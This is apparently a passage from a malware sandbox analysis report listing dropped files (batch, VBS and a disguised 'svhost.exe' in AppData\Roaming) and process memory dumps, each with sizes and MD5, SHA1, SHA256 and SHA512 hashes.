ec31b5d90a35b88fb2b625f69104b791f742c4a27a85754f95dfcf1f2804c580

SHA512
8332f5b9c89d327486caae79a8c17ae4eaf146141d2aa9fbb40c0e885ed9a943bbf22daa75132663e789f27d0771854e1e47eefb39897098ea326e5aa74dd463

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_62.bat

Filesize
285KB

MD5
d8cfc3f47a867b0e75997070c3281de8

SHA1
141a013d4677b2c2453b429372d6373b1a187c63

SHA256
85d20a24df655ec1f11e1c39f5f4d74dfce232321dbe6b41a5159a8cf6073ca1

SHA512
9da1cc237a7c324457b3c72ee31403edea528c6bb82e2a464fd29be70a4bf50a7fceabfeefb408e317b8dc0100ec6ffe7575182b6c3e7fa91f2e4767bfb84eac

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_62.vbs

Filesize
114B

MD5
66691b9ca5e747313733d287529622fc

SHA1
6eb3d77521b5f138ef2083c2a3b13e6789ace0eb

SHA256
53db3cd4283a1adf2d0e87ec90444e310d5c27e76cdbc4d908004c60a90985f9

SHA512
3a03becdb31821b9570062fb3f2253f15bedc6d0108f7e3d25f5d7a7f2dcdf816760e25ebd732015ba789fde6a9bfa617134f92f853ff1fbc2e3181b79fb3fbd

Download Submit
C:\Users\Admin\AppData\Roaming\svhost.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
\??\pipe\LOCAL\crashpad_3044_ROELWXXOWHMVRBSP

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1944-65-0x0000026F54260000-0x0000026F542A6000-memory.dmp

Filesize
280KB

Download
memory/2812-30-0x00007FF971640000-0x00007FF972102000-memory.dmp

Filesize
10.8MB

Download
memory/2812-27-0x00007FF971640000-0x00007FF972102000-memory.dmp

Filesize
10.8MB

Download
memory/2812-18-0x00007FF971640000-0x00007FF972102000-memory.dmp

Filesize
10.8MB

Download
memory/2812-17-0x00007FF971640000-0x00007FF972102000-memory.dmp

Filesize
10.8MB

Download
memory/2812-16-0x00007FF971640000-0x00007FF972102000-memory.dmp

Filesize
10.8MB

Download
memory/3560-14-0x0000023779CF0000-0x0000023779D28000-memory.dmp

Filesize
224KB

Download
memory/3560-67-0x00007FF971640000-0x00007FF972102000-memory.dmp

Filesize
10.8MB

Download
memory/3560-66-0x00007FF971643000-0x00007FF971645000-memory.dmp

Filesize
8KB

Download
memory/3560-0-0x00007FF971643000-0x00007FF971645000-memory.dmp

Filesize
8KB

Download
memory/3560-13-0x0000023761AC0000-0x0000023761AC8000-memory.dmp

Filesize
32KB

Download
memory/3560-12-0x00007FF971640000-0x00007FF972102000-memory.dmp

Filesize
10.8MB

Download
memory/3560-11-0x00007FF971640000-0x00007FF972102000-memory.dmp

Filesize
10.8MB

Download
memory/3560-10-0x00007FF971640000-0x00007FF972102000-memory.dmp

Filesize
10.8MB

Download
memory/3560-9-0x0000023779BE0000-0x0000023779C02000-memory.dmp

Filesize
136KB

Download
memory/3780-48-0x0000026EF2D90000-0x0000026EF2DA8000-memory.dmp

Filesize
96KB

Download